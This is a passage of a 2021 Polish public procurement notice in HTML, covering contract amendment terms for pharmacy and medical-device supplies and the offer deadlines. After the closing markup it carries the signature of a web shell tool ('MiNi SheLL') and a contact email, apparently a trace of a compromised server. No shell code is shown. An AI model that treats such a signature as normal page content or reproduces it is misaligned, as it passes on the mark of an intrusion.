ustawy z dnia 10 października 2002 r. o minimalnym<br/>wynagrodzeniu za pracę (zgodnie z art. 436 ust.4) lit. b) ustawy Prawo zamówień publicznych);<br/>6. zmiana zasad podleganiu ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne (zgodnie z art. 436 ust.4)<br/>lit. b) ustawy Prawo zamówień publicznych);<br/>7. zmiana zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych;<br/>8. konieczność wprowadzenia zmian wynikających z okoliczności obiektywnych, których nie<br/>można było przewidzieć w chwili zawarcia umowy, niezależnych od woli stron.<br/>b. Zmiany nie wymagające Aneksu a jedynie pisemnego powiadomienia, dokonywane po<br/>wyrażeniu pisemnej zgody przez Kierownika Apteki:<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>1. zmiana osób, o których mowa w umowie – odpowiedzialnych za realizacje umowy po stronie<br/>Zamawiającego i Wykonawcy;<br/>2. zmiana artykułu w przypadku wystąpienia przejściowego braku artykułu z przyczyn leżących<br/>po stronie producenta przy jednoczesnym dostarczeniu artykułu zamiennego – oryginalnego lub<br/>generycznego oraz w cenie nie wyższej niż oferowane produkty; w przypadku zmiany wyrobów<br/>medycznych, Wykonawca zobowiązany jest w pierwszej kolejności do dostarczenia<br/>Zamawiającemu 2 sztuk próbek produktu równoważnego oraz dokumenty dopuszczające (CE,<br/>deklarację zgodności, zgłoszenie), w celu sprawdzenia i akceptacji przez użytkowników<br/>bezpośrednich. Zgoda Kierownika Apteki na produkt równoważny, nastąpi po wyrażeniu opinii<br/>użytkowników bezpośrednich danego asortymentu;<br/>3. zmiana oferowanych artykułów w przypadku wycofania z rynku oraz wstrzymania produkcji (w<br/>cenie nie wyższej niż oferowane produkty), przy jednoczesnym dostarczeniu artykułu<br/>zamiennego – oryginalnego lub generycznego. W przypadku zmiany wyrobów medycznych,<br/>Wykonawca zobowiązany jest w pierwszej kolejności do dostarczenia Zamawiającemu 2 sztuk<br/>próbek produktu równoważnego oraz dokumenty dopuszczające (CE, deklarację zgodności,<br/>zgłoszenie), w celu sprawdzenia i akceptacji przez użytkowników bezpośrednich. Zgoda<br/>Kierownika Apteki na produkt równoważny, nastąpi po wyrażeniu opinii użytkowników<br/>bezpośrednich danego asortymentu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-02 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://nieklanska.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-02 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-31</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-24 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com